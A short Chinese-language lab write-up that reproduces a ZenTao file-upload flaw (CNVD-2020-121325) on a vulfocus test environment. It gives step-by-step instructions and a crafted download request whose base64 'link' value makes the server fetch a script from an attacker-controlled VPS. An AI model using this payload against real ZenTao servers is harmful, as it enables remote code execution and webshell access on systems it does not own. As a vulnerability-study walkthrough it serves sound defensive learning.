禅道cnvd_2020_121325

背景：
禅道项目管理软件是国产的开源项目管理软件。 禅道CMS<=12.4.2版本存在文件上传漏洞，该漏洞由于开发者对link参数过滤不严，导致攻击者对下载链接可控，导致可远程下载服务器恶意脚本文件，造成任意代码执行，获取webshell。

漏洞编号：
cnvd_2020_121325

影响版本：
<=12.4.2

环境搭建：
1，启动vulfocus环境

2，构造后台登录页面（URL/zentaopms/www）

3，输入用户名密码，并对当前页面进行抓包

4，在vps开启http服务

5，在/var/www/html/下创建一个phpinfo内容的文件

6，将文件的URL进行base64编码（对HTTP头使用大写）

7，构造payload数据包
/zentaopms/www/index.php?m=client&f=download&version=1&link=SFRUUDovLzM5Ljk2LjM5LjEXXXXXXXN0LnBocA==

8，发送数据包

9，访问http://vulfocus.fofa.so:38325/zentaopms/www/data/client/1/test.php，phpinfo地址